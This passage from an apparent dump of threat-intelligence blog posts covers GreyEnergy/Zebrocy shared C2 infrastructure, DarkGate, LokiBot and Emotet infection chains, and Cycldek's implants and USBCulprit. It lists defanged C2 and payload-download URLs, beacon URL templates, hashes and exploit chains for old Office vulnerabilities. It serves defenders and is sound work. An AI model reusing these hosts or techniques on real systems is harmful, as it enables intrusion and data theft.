(MD5):\n\n7f20f7fbce9deee893dbce1a1b62827d \n170d2721b91482e5cabf3d2fec091151 \neae0b8997c82ebd93e999d4ce14dedf5 \na5cbf5a131e84cd2c0a11fca5ddaa50a \nc9e1b0628ac62e5cb01bf1fa30ac8317\n\nThe URL used to download additional data looks as follows:\n\nhxxp://**193.23.181**[.]151/help-desk/remote-assistant-service/PostId.php?q={hex}\n\nThis same C2 server was also used in a spearphishing email attachment sent by GreyEnergy (aka FELIXROOT), as mentioned in a [FireEye report](<https://www.fireeye.com/blog/threat-research/2018/07/microsoft-office-vulnerabilities-used-to-distribute-felixroot-backdoor.html>). Details on this attachment are as follows:\n\n * The file (11227eca89cc053fb189fac3ebf27497) with the name \"Seminar.rtf\" exploited CVE-2017-0199\n * \"Seminar.rtf\" downloaded a second stage document from: hxxp://**193.23.181[.]151**/Seminar.rtf (4de5adb865b5198b4f2593ad436fceff, exploiting CVE-2017-11882)\n * The original document (Seminar.rtf) was hosted on the same server and downloaded by victims from: hxxp://**193.23.181[.]151**/ministerstvo-energetiki/seminars/2019/06/Seminar.rtf\n\nAnother server we detected that was used both by Zebrocy and by GreyEnergy is **185.217.0[.]124**. Similarly, we detected a spearphishing GreyEnergy document (a541295eca38eaa4fde122468d633083, exploiting CVE-2017-11882), also named \"Seminar.rtf\".\n\n[![](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/01/23125754/190123-GreyEnergy_overlap-1.png)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/01/23125754/190123-GreyEnergy_overlap-1.png>)\n\n_\"Seminar.rtf\", a GreyEnergy decoy document_\n\nThis document downloads a GreyEnergy sample (78734cd268e5c9ab4184e1bbe21a6eb9) from the following SMB link:\n\n\\\\\\**185.217.0[.]124**\\Doc\\Seminar\\Seminar_2018_1.AO-A\n\nThe following Zebrocy samples use this server as C2:\n\n7f20f7fbce9deee893dbce1a1b62827d \n170d2721b91482e5cabf3d2fec091151 \n3803af6700ff4f712cd698cee262d4ac \ne3100228f90692a19f88d9acb620960d\n\nThey retrieve additional data from the following URL:\n\nhxxp://**185.217.0[.]124**/help-desk/remote-assistant-service/PostId.php?q={hex}\n\nIt is worth noting that at least two samples from the above list use both **193.23.181[.]151** and **185.217.0[.]124** as C2s.\n\n[![](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/01/23125807/190123-GreyEnergy_overlap-2.png)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/01/23125807/190123-GreyEnergy_overlap-2.png>)\n\n_Hosts associated with GreyEnergy and Zebrocy_\n\n### **Attacked company**\n\nAdditionally, both GreyEnergy and Zebrocy spearphishing documents targeted a number of industrial companies in Kazakhstan. One of them was attacked in June 2018.\n\n[![](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/01/24083359/190124-GreyEnergy_overlap-3.png)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/01/24083359/190124-GreyEnergy_overlap-3.png>)\n\n_GreyEnergy and Zebrocy overlap_\n\n### **Attack timeframe**\n\nA spearphishing document entitled 'Seminar.rtf', which retrieved a GreyEnergy sample, was sent to the company approximately on June 21, 2018, followed by a Zebrocy spearphishing document sent approximately on June 28:\n\n[![](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/01/23125842/190123-GreyEnergy_overlap-4.png)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/01/23125842/190123-GreyEnergy_overlap-4.png>)\n\n_'(28.06.18) Izmeneniya v prikaz PK.doc' Zebrocy decoy document translation: _ \n_'Changes to order, Republic of Kazakhstan'_\n\nThe two C2 servers discussed above were actively used by Zebrocy and GreyEnergy almost at the same time:\n\n * 193.23.181[.]151 was used by GreyEnergy and Zebrocy in June 2018\n * 185.217.0[.]124 was used by GreyEnergy between May and June 2018 and by Zebrocy in June 2018\n\n## **Conclusions **\n\nThe GreyEnergy/BlackEnergy actor is an advanced group that possesses extensive knowledge on penetrating into their victim\u00b4s networks and exploiting any vulnerabilities it finds. This actor has demonstrated its ability to update its tools and infrastructure in order to avoid detection, tracking, and attribution.\n\nThough no direct evidence exists on the origins of GreyEnergy, the links between a Sofacy subset known as Zebrocy and GreyEnergy suggest that these groups are related, as has been suggested before by some public analysis. In this paper, we detailed how both groups shared the same C2 server infrastructure during a certain period of time and how they both targeted the same organization almost at the same time, which seems to confirm the relationship's existence.\n\nFor more information about APT reports please contact: intelreports@kaspersky.com \n\nFor more information about ICS threats please contact: [ics-cert@kaspersky.com](<mailto:cs-cert@kaspersky.com>)", "cvss3": {}, "published": "2019-01-24T09:00:47", "type": "securelist", "title": "GreyEnergy\u2019s overlap with Zebrocy", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2017-0199", "CVE-2017-11882"], "modified": "2019-01-24T09:00:47", "id": "SECURELIST:3DB11A5605F77743FA5F931DF816A83C", "href": "https://securelist.com/greyenergys-overlap-with-zebrocy/89506/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2023-09-12T04:35:12", "description": "![](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/08/02185050/sl-malware-bug-research-magnifier-red-990x400.jpg)\n\n## Introduction\n\nThe malware landscape keeps evolving. New families are born, while others disappear. Some families are short-lived, while others remain active for quite a long time. In order to follow this evolution, we rely both on samples that we detect and our monitoring efforts, which cover botnets and underground forums.\n\nWhile doing so, we found new [Emotet](<https://securelist.com/emotet-modules-and-recent-attacks/106290/>) samples, a new loader dubbed "DarkGate", and a new [LokiBot infostealer](<https://www.cisa.gov/news-events/cybersecurity-advisories/aa20-266a>) campaign. We described all three in private reports, from which this post contains an excerpt.\n\nIf you want to learn more about our crimeware reporting service, please contact us at [crimewareintel@kaspersky.com](<mailto:crimewareintel@kaspersky.com>).\n\n## DarkGate\n\nIn June 2023, a well-known malware developer posted an advertisement on a popular dark web forum, boasting of having developed a loader that he had been working on for more than 20,000 hours since 2017. Some of the main features, which went beyond typical downloader functionality, supposedly included the following:\n\n * Hidden VNC\n * Windows Defender exclusion\n * Browser history stealer\n * Reverse proxy\n * File manager\n * Discord token stealer\n\nThe full list of the touted capabilities is available in our private report.\n\nThe sample we obtained is missing some of these features, but that doesn't mean much, as they are enabled or disabled in the builder anyway. We were, however, able to reconstruct the infection chain, which consists of four stages, all the way to loading the final payload: DarkGate itself.\n\n 1. **VBS downloader script**: The script is fairly simple. It sets several environment variables to obfuscate subsequent command invocations. Two files (Autoit3.exe and script.au3) are then downloaded from the C2, and Autoit3.exe is executed with script.au3 as an argument.\n 2. **AutoIT V3 script**: AutoIT V3 is a BASIC-like freeware scripting language, which is often used by malware authors, as it can simulate keystrokes and mouse movements, among other things. The script that is executed is obfuscated, but ultimately allocates memory to the embedded shellcode and finally executes the shellcode.\n 3. **Shellcode**: The shellcode is pretty straightforward: it constructs a PE file in the memory, resolves imports dynamically and transfers control to it.\n 4. **DarkGate executor **(the PE file constructed by the shellcode): The executor loads the script.au3 file into the memory and locates an encrypted blob within the script. The encrypted blob is then decrypted (using a XOR key and a final NOT operation). This results in a PE file, whose import table is dynamically resolved. The final result is the DarkGate loader.\n\nThe DarkGate loader has several global variables, actually a Delphi TStringList, comprising 17 variables that describe the core functionality of the malware:\n\n 1. Variable that is set if an AV is found\n 2. Variable that is set if a virtual environment is found\n 3. Variable that is set if a Xeon processor is found\n 4. C2 port number\n\nThe full list of variables is available in our private report. The core functionality does not include malware loading, which is implemented in a separate module.\n\nWhat also stands out is the way strings are encrypted. Each string is encrypted with a unique key and a custom version of Base64 encoding using a custom character set.\n\n## LokiBot\n\nLokiBot is an infostealer that first surfaced in 2016 and remains active today. It is designed to steal credentials from various applications, such as browsers, FTP clients and others. Recently, we detected a phishing campaign targeting cargo ship companies that drops LokiBot.\n\nIn the cases we investigated, the victims received an email appearing to come from a business contact and stating port expenses that needed to be paid. Attached to the email was an Excel document. As expected, when opening the document the user was asked to enable macros. However, this was a fake warning, as the document did not contain any macros, trying to exploit [CVE-2017-0199](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-0199>) instead.\n\nThat vulnerability makes it possible to open a remote document by providing a link. This results in downloading an RTF document, which in turn exploits another vulnerability, namely [CVE-2017-11882](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2017-11882>). By exploiting this other vulnerability, LokiBot is downloaded and executed.\n\nOnce executed, it collects credentials from various sources and saves into a buffer inside the malware, after which it sends them to the C2. Data is sent via POST requests compressed with APLib. After sending out system information, the malware listens for additional C2 commands. These commands can be used to download additional malware, run a keylogger, and so on.\n\n## Emotet\n\nEmotet is a notorious botnet that, despite [being taken down](<https://www.europol.europa.eu/media-press/newsroom/news/world%E2%80%99s-most-dangerous-malware-emotet-disrupted-through-global-action>) in 2021, resurfaced later. In their recent wave of attacks, they jumped on the OneNote infection bandwagon,sending emails with malicious OneNote files. Opening one of these displays an image similar to the one below.\n\n[![Emotet OneNote decoy document](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/08/01154150/Crimeware_report_Emotet_LokiBot_and_DarkGate_01-1024x700.png)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/08/01154150/Crimeware_report_Emotet_LokiBot_and_DarkGate_01.png>)\n\nEmotet OneNote decoy document\n\nClicking on the view button executes the embedded and obfuscated malicious VBScript. The deobfuscated code is fairly simple.\n\n[![Deobfuscated downloader script](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/08/01154229/Crimeware_report_Emotet_LokiBot_and_DarkGate_02.png)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/08/01154229/Crimeware_report_Emotet_LokiBot_and_DarkGate_02.png>)\n\nDeobfuscated downloader script\n\nAs one can see, there are several sites containing the payload. The script tries each of them until it succeeds, and then saves the payload, a DLL, in the temp directory, executing it with regsvc32.exe. The executed DLL then loads a resource (LXGUM) from its resource section and decrypts it with a simple rolling XOR algorithm as illustrated below.\n\n[![Resource decryption code](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/08/01154317/Crimeware_report_Emotet_LokiBot_and_DarkGate_03-1024x494.png)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/08/01154317/Crimeware_report_Emotet_LokiBot_and_DarkGate_03.png>)\n\nResource decryption code\n\nThe decrypted payload is actually shellcode that does a typical import by hash. Two of the resolved functions are LdrLoadDll and LdrGetProcedureAddress, frequently used by malware authors to evade dynamic analysis of well-known APIs: LoadLibrary and GetProcAddress in this case. Next, memory is allocated, and a blob (a PE file) from the resource section is written to the allocated memory, which is the final Emotet payload. DLL dependencies are resolved, and the Import Address Table (IAT) is reconstructed. The shellcode then overwrites the DOS header of the PE file, in order to make it more difficult for EDR solutions to detect the binary in the memory. Finally, Emotet is executed.\n\nThe Emotet payload itself remains the same as in the previous waves of attacks.\n\n## Conclusion\n\nMalware continuously evolves, and TTPs change, hindering detection. Besides, it can be difficult for an organization to decide which type of malware threat to defend from first. Intelligence reports can help you to identify the threats relevant to your business and to stay protected against these. If you want to keep up to date on the latest TTPs used by criminals, or if you have questions about our private reports, reach out to us at [crimewareintel@kaspersky.com](<mailto:crimewareintel@kaspersky.com>).\n\n## Indicators of compromise (MD5s)\n\nLokiBot \n[31707f4c58be2db4fc43cba74f22c9e2](<https://opentip.kaspersky.com/31707f4c58be2db4fc43cba74f22c9e2/?utm_source=SL&utm_medium=SL&utm_campaign=SL>) \n[2c5cf406f3e4cfa448b167751eaea73b](<https://opentip.kaspersky.com/2c5cf406f3e4cfa448b167751eaea73b/?utm_source=SL&utm_medium=SL&utm_campaign=SL>)\n\nDarkGate \n[1B9E9D90136D033A52D2C282503F33B7](<https://opentip.kaspersky.com/1B9E9D90136D033A52D2C282503F33B7/?utm_source=SL&utm_medium=SL&utm_campaign=SL>) \n[149DA23D732922B04F82D634750532F3](<https://opentip.kaspersky.com/149DA23D732922B04F82D634750532F3/?utm_source=SL&utm_medium=SL&utm_campaign=SL>)\n\nEmotet \n[238f7e8cd973a386b61348ab2629a912](<https://opentip.kaspersky.com/238f7e8cd973a386b61348ab2629a912/?utm_source=SL&utm_medium=SL&utm_campaign=SL>) \n[df3ee4fb63c971899e15479f9bca6853](<https://opentip.kaspersky.com/df3ee4fb63c971899e15479f9bca6853/?utm_source=SL&utm_medium=SL&utm_campaign=SL>)", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2023-08-03T10:00:32", "type": "securelist", "title": "What\u2019s happening in the world of crimeware: Emotet, DarkGate and LokiBot", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-0199", "CVE-2017-11882"], "modified": "2023-08-03T10:00:32", "id": "SECURELIST:A71E207678429F2F49013A82A5A5EED4", "href": "https://securelist.com/emotet-darkgate-lokibot-crimeware-report/110286/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-06-03T11:50:54", "description": "![](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/02/21111141/abstract_blur_code-990x400.jpg)\n\n## Key findings\n\nWhile investigating attacks related to a group named Cycldek post 2018, we were able to uncover various pieces of information on its activities that were not known thus far. In this blog post we aim to bridge the knowledge gap on this group and provide a more thorough insight into its latest activities and modus operandi. Here are some key insights that will be described in this publication:\n\n * Cycldek (also known as Goblin Panda and Conimes) has been active in the past two years, conducting targeted operations against governments in Southeast Asia.\n * Our analysis shows two distinct patterns of activity, indicating the group consists of two operational entities that are active under a mutual quartermaster.\n * We were able to uncover an extensive toolset for lateral movement and information stealing used in targeted networks, consisting of custom and unreported tools as well as living-off-the-land binaries.\n * One of the newly revealed tools is named USBCulprit and has been found to rely on USB media in order to exfiltrate victim data. This may suggest Cycldek is trying to reach air-gapped networks in victim environments or relies on physical presence for the same purpose.\n\n## Background\n\nCycldek is a long-known Chinese-speaking threat actor. Based on the group's past activity, it has a strong interest in Southeast Asian targets, with a primary focus on large organizations and government institutions in Vietnam. This is evident from a series of targeted campaigns that are publicly attributed to the group, as outlined below:\n\n * 2013 - indicators affiliated to the group were found in a network of a technology company operating in several sectors, as briefly [described](<https://www.crowdstrike.com/blog/meet-crowdstrikes-adversary-of-the-month-for-august-goblin-panda/>) by CrowdStrike.\n * 2014 - further accounts by CrowdStrike describe vast activity by the group against Southeast Asian organizations, most notably Vietnam. The campaigns made prominent use of Vietnamese-language lure documents, delivering commodity malware like PlugX, that was typically leveraged by Chinese-speaking actors.\n * 2017 - the group was witnessed launching attacks using RTF lure documents with political content related to Vietnam, dropping a variant of a malicious program named NewCore RAT, as [described](<https://www.fortinet.com/blog/threat-research/rehashed-rat-used-in-apt-campaign-against-vietnamese-organizations.html>) by Fortinet.\n * 2018 - attacks have been witnessed in government organizations across several Southeast Asian countries, namely Vietnam, Thailand and Laos, using a variety of tools and new TTPs. Those include usage of the Royal Road builder, developed versions of the NewCore RAT malware and other unreported implants. These were the focus of intel reports available to Kaspersky's Threat Intelligence Portal subscribers since October 2019, and will be the subject matter of this blog post.\n\n[![](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/05/26122651/cycldek_bridging_01.png)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/05/26122651/cycldek_bridging_01.png>)\n\n**__Figure 1_: Timeline of Cycldek-attributed attacks._**\n\nMost attacks that we observed after 2018 start with a politically themed RTF document built with the 8.t document builder (also known as 'Royal Road') and sent as a phishing mail to the victims. These documents are bundled with 1-day exploits (e.g. CVE-2012-0158, CVE-2017-11882, CVE-2018-0802) which in turn run a dropper for three files:\n\n * a legitimate signed application, usually related to an AV product, e.g. QcConsol - McAfee's QuickClean utility, and wsc_proxy.exe, Avast's remediation service.\n * a malicious DLL which is side-loaded by the former application.\n * an encrypted binary which gets decrypted and executed by the DLL.\n\nThe final payload that is run in memory is malware known as NewCore RAT. It is based on an open-source framework named PcShare or PcClient that used to be prevalent in Chinese hacker forums more than a decade ago. Today, the software is fully available on [Github](<https://github.com/xdnice/PCShare>), allowing attackers to leverage and modify it for their needs.\n\nIn the case of Cycldek, the first public accounts of the group's usage of NewCore date back to 2017. As described in a blog post by Fortinet, the malware provides the attacker with broad capabilities such as conducting a range of operations on files, taking screenshots, controlling the machine via a remote shell and shutting down or restarting the system.\n\n## Two implants, two clusters\n\nWhen inspecting the NewCore RAT malware delivered during the various attacks we investigated, we were able to distinguish between two variants. Both were deployed as side-loaded DLLs and shared multiple similarities, both in code and behavior. At the same time, we noticed differences that indicate the variants could have been used by different operators.\n\nOur analysis shows that the underlying pieces of malware and the way they were used form two clusters of activity. As a result, we named the variants BlueCore and RedCore and examined the artifacts we found around each one in order to profile their related clusters. Notable characteristics of each cluster's implant are summarized in the table below.\n\n| **BlueCore** | **RedCore** | \n---|---|---|--- \nInitial Infection Vector | RTF documents | Unknown | \nLegitimate AV Utility | QcConcol.exe (McAfee's QuickClean utility) | wsc_proxy.exe (Avast's remediation application) | \nSide-Loaded DLL | QcLite.dll | wsc.dll | \nPayload Loader | stdole.tlb - contains PE loading shellcode and an encrypted BlueCore binary | msgsm64.acm -contains PE loading shellcode and and an encrypted RedCore binary | \nInjected Process | dllhst3g.exe | explorer.exe or winlogon.exe | \nConfiguration File | %APPDATA%\\desktop.ini | C:\\Documents and Settings\\All Users\\Documents\\desktop.ini or\n\nC:\\Documents and Settings\\All Users\\Documents\\desktopWOW64.ini | \nMutexes | UUID naming scheme, e.g. {986AFDE7-F299-4A7D-BBF4-CA756FC27208}, {CF94A87F-4B49-4751-8E5C-DA2D0A8DEC2F} | UUID naming scheme, e.g. {CB191C19-1D2D-45FC-9092-6DB462EFEAC6},\n\n{F0062B9A-15F8-4D5F-9DE8-02F39EBF71FB},\n\n{E68DFA68-1132-4A32-ADE2-8C87F282C457},\n\n{728264DE-3701-419B-84A4-2AD86B0C43A3},\n\n{2BCD5B61-288C-44D5-BA0D-AAA00E9D2273},\n\n{D9AE3AB0-D123-4F38-A9BE-898C8D49A214} | \nCommunicated URL Scheme | http://%s:%d/link?url=%s&enpl=%s&encd=%s | http://%s:%d/search.jsp?referer=%s&kw=%s&psid=%s\n\nor\n\nhttp://%s:%d/search.jsp?url=%s&referer=%s&kw=%s&psid=%s | \n \n_**_Table 1_: Comparison of BlueCore and RedCore loader and implant traits.** _\n\nAs demonstrated by the table, the variants share similar behavior. For example, both use DLL load order hijacking to run code from DLLs impersonating dependencies of legitimate AV utilities and both share a mutex naming convention of random UUIDs, where mutexes are used for synchronization of thread execution. By comparing code in both implants, we can find multiple functions that originate from the PCShare RAT; however, several others (like the injection code in the figure below) are proprietary and demonstrate identical code that may have been written by a shared developer.\n\n[![](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/05/26122817/cycldek_bridging_02.png)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/05/26122817/cycldek_bridging_02.png>)\n\n**__Figure_ 2: Code similarity in proprietary injection code used in both RedCore and BlueCore implants. Code marked in yellow in BlueCore is an inlined version of the marked function in RedCore._**\n\nMoreover, both implants leverage similar injected shellcode used to load the RedCore and BlueCore implants. This shellcode, which resides in the files 'stdole.tlb' and 'msgsm64.acm', contains a routine used to decrypt the implants' raw executable from an embedded blob, map it to memory and execute it from its entry point in a new thread. Since both pieces of shellcode are identical for the two variants and cannot be attributed to any open source project, we estimate that they originate from a proprietary shared resource.\n\n[![](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/05/26122905/cycldek_bridging_03.png)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/05/26122905/cycldek_bridging_03.png>)\n\n**__Figure 3_: Call flow graph comparison for binary decryption functions used by the shellcode in both clusters._**\n\nHaving said that, it is also evident that there are differences between the variants. The clearest distinctions can be made by looking at malware functionality that is unique to one type of implant and absent from the other. The following are examples of features that could be found only in RedCore implants, suggesting that despite their similarity with BlueCore, they were likely used by a different entity for different purposes:\n\n * _Keylogger_: RedCore records the title of the current foreground window (if it exists) and logs keystrokes each 10ms to an internal buffer of size 65530. When this buffer is filled, data from it is written to a file named 'RCoRes64.dat'. The data is encoded using a single byte XOR with the key 0xFA.\n * _Device enumerator_: RedCore registers a window class intended to intercept window messages with a callback that checks if the inspected message was sent as a result of a DBT_DEVICEARRIVAL Such events signal the connection of a device to the system, in which case the callback verifies that this device is a new volume, and if it is, it sends a bitmap with the currently available logical drives to the C&C.\n * _RDP logger_: RedCore subscribes to an RDP connection event via ETW and notifies the C&C when it occurs. The code that handles this functionality is based on a little-known Github repository named [EventCop](<https://github.com/Mandar-Shinde/EventCop>) which is intended to obtain a list of users that connected to a system via RDP. The open-source code was modified so that instead of printing the data of the incoming connection, the malware would contact the C&C and inform it about the connection event.\n * _Proxy server_: RedCore spawns a server thread that listens on a pre-configured port (by default 49563) and accepts requests from non-localhost connections. A firewall exception is made for the process before the server starts running, and any subsequent requests passed from a source to it will be validated and passed on to the C&C in their original format.\n\nPerhaps the most notable difference between the two implants is the URL scheme they use to connect and beacon their C&C servers. By looking for requests made using similar URL patterns in our telemetry, we were able to find multiple C&C servers and divide the underlying infrastructure based on the aforementioned two clusters. The requests by each malware type were issued only by legitimate and signed applications that were either leveraged to side-load a malicious DLL or injected with malicious code. All of the discovered domains were used to download further samples.\n\n[![](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/05/26122956/cycldek_bridging_04.png)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/05/26122956/cycldek_bridging_04.png>)\n\n**__Figure 4_: Difference in URL scheme used by each implant for C2 communication._**\n\nThe conclusion that we were able to reach from this is that while all targets were diplomatic and government entities, each cluster of activity had a different geographical focus. The operators behind the BlueCore cluster invested most of their efforts on Vietnamese targets with several outliers in Laos and Thailand, while the operators of the RedCore cluster started out with a focus on Vietnam and diverted to Laos by the end of 2018. The statistics of these activities, based on the number of detected samples we witnessed downloaded from each cluster of C&Cs, are outlined in the figures below.\n\n[![](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/05/26123040/cycldek_bridging_05.png)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/05/26123040/cycldek_bridging_05.png>)\n\n[![](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/05/26123118/cycldek_bridging_06.png)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/05/26123118/cycldek_bridging_06.png>)\n\n_**_Figure 5_: Volume of downloaded samples from C&Cs of each cluster by country and month, since mid-2018.** _\n\nFurthermore, considering both differences and similarities, we are able to conclude that the activities we saw are affiliated to a single actor, which we refer to as Cycldek. In several instances, we spotted unique tools crafted by the group that were downloaded from servers of both groups. One example of this, which can be seen in the figure below, is a tool custom built by the group named USBCulprit. Two samples of it were downloaded from both BlueCore and RedCore servers. A more comprehensive list can be found in the Appendix. All in all, this suggests the entities operating behind those clusters are sharing multiple resources \u2013 both code and infrastructure \u2013 and operating under a single organizational umbrella.\n\n[![](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/05/26123202/cycldek_bridging_07.png)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/05/26123202/cycldek_bridging_07.png>)\n\n_**_Figure 6_: Examples of proprietary malware named USBCulprit downloaded from servers of both clusters. Further examples are provided in the Appendix.** _\n\n## Info stealing and lateral movement toolset\n\nDuring the analysis, we were able to observe a variety of tools downloaded from both BlueCore and RedCore implants used for either lateral movement in the compromised networks or information stealing from infected nodes. There were several types of these tools \u2013 some were proprietary and formerly unseen in the wild; others were pieces of software copied from open-source post-exploitation frameworks, some of which were customized to complete specific tasks by the attackers.\n\nAs in the cases of RedCore and BlueCore, the downloaded tools were all invoked as side-loaded DLLs of legitimate signed applications. Such applications included AV components like wsc_proxy.exe (Avast remediation service), qcconsol.exe and mcvsshld.exe (McAfee components), as well as legitimate Microsoft and Google utilities like the resource compiler (rc.exe) and Google Updates (googleupdate.exe). These tools could be used in order to bypass weak security mechanisms like application whitelisting, grant the malware additional permissions during execution or complicate incident response.\n\nAs already mentioned, the bulk of these tools are common and widespread among attackers, sometimes referred to as living-off-the-land binaries, or LOLbins. Such tools can be part of open-source and legitimate software, abused to conduct malicious activities. Examples include BrowserHistoryView (a Nirsoft utility to obtain browsing history from common browsers), ProcDump (Sysinternals tools used to dump memory, possibly to obtain passwords from running processes), Nbtscan (command line utility intended to scan IP networks for NetBIOS information) and PsExec (Sysinternals tools used to execute commands remotely in the network, typically used for lateral movement).\n\nThe rest of the tools were either developed fully by the attackers or made use of known tools that were customized to accommodate particular attack scenarios. The following are several notable examples:\n\n * **Custom HDoor: **an old tool providing full-featured backdoor capabilities like remote machine administration, information theft, lateral movement and the launch of DDoS attacks. Developed by a hacker known as Wicked Rose, it was popular in Chinese underground forums for a while and made its way into the APT world in the form of variants based on it. One example is the [Naikon APT](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/03/07205555/TheNaikonAPT-MsnMM1.pdf>) that made use of the original tool. \nThe custom version used by Cycldek uses a small subset of the features and the attackers used it to scan internal networks and create tunnels between compromised hosts in order to avoid network detections and bypass proxies. The tool allows the attackers to exfiltrate data from segregated hosts accessible through the local network but not connected to the internet.\n\n[![](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/05/26123304/cycldek_bridging_08.png)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/05/26123304/cycldek_bridging_08.png>)\n\n_**_Figure 7_: Command line usage of the custom HDoor tool.** _\n\n * **JsonCookies**: proprietary tool that steals cookies from SQLite databases of Chromium-based browsers. For this purpose, the sqlite3.dll library is downloaded from the C&C and used during execution to parse the database and generate a JSON file named 'FuckCookies.txt' containing stolen cookie info. Entries in the file resemble this one:\n \n \n {\n \"domain\": \".google.com\",\n \"id\": 1,\n \"name\": \"NID\",\n \"path\": \"/\",\n \"value\": \"%VALUE%\"\n }\n\n * **ChromePass**: proprietary tool that steals saved passwords from Chromium-based browser databases. The output of the parsed database is an HTML document containing a table with URLs and their corresponding stolen username and password information. This program includes a descriptive command line message that explains how to use it, as outlined below.\n\n[![](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/05/26123439/cycldek_bridging_09.png)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/05/26123439/cycldek_bridging_09.png>)\n\n**__Figure 8_: Command line usage of the ChromePass tool._**\n\n#### \n\n## Formerly Unreported Malware: USBCulprit\n\nOne of the most notable examples in Cycldek's toolset that demonstrates both data stealing and lateral movement capabilities is a malware we discovered and dubbed USBCulrpit. This tool, which we saw downloaded by RedCore implants in several instances, is capable of scanning various paths in victim machines, collecting documents with particular extensions and passing them on to USB drives when they are connected to the system. It can also selectively copy itself to a removable drive in the presence of a particular file, suggesting it can be spread laterally by having designated drives infected and the executable in them opened manually.\n\nDuring the time the malware was active, it showed little change in functionality. Based on Kaspersky's telemetry, USBCulprit has been seen in the wild since 2014, with the latest samples emerging at the end of 2019. The most prominent addition incorporated to samples detected after 2017 is the capability to execute files with a given name from a connected USB. This suggests that the malware can be extended with other modules. However, we were not able to capture any such files and their purpose remains unknown.\n\nAnother change we saw is the loading scheme used for variants spotted after 2017. The older versions made use of a dropper that wrote a configuration file to disk and extracted an embedded cabinet archive containing a legitimate binary and a malicious side-loaded DLL. This was improved in the newer versions, where an additional stage was added, such that the side-loaded DLL decrypts and loads a third file from the archive containing the malicious payload. As a result, the latter can be found in its decrypted form only in memory.\n\nThis loading scheme demonstrates that the actor behind it makes use of similar TTPs seen in the previously described implants attributed to Cycldek. For example, binaries mimicking AV components are leveraged for conducting DLL load-order hijacking. In this case, one of the files dropped from the cabinet archive named 'wrapper.exe' (originally named 'PtUserSessionWrapper.exe' and belonging to Trend Micro) forces the execution of a malicious DLL named 'TmDbgLog.dll'. Also, the malware makes use of an encrypted blob that is decrypted using RC4 and executed using a custom PE loader. The full chain is depicted in the figure below.\n\n[![](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/05/26123540/cycldek_bridging_10.png)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/05/26123540/cycldek_bridging_10.png>)\n\n**__Figure 9_: USBCulprit's loading flow, as observed in samples after 2017._**\n\nOnce USBCulprit is loaded to memory and executed, it operates in three phases:\n\n * **Boostrap and data collection:** this stage prepares the environment for the malware's execution. Namely, it invokes two functions named 'CUSB::RegHideFileExt' and 'CUSB::RegHideFile' that modify registry keys to hide the extensions of files in Windows and verify that hidden files are not shown to the user. It also writes several files to disk and initializes a data structure with paths that are later used or searched by the malware.Additionally, the malware makes a single scan to collect files it intends to steal using a function named 'CUSB::USBFindFile'. They are sought by enumerating several predefined directories to locate documents with either one of the following extensions: 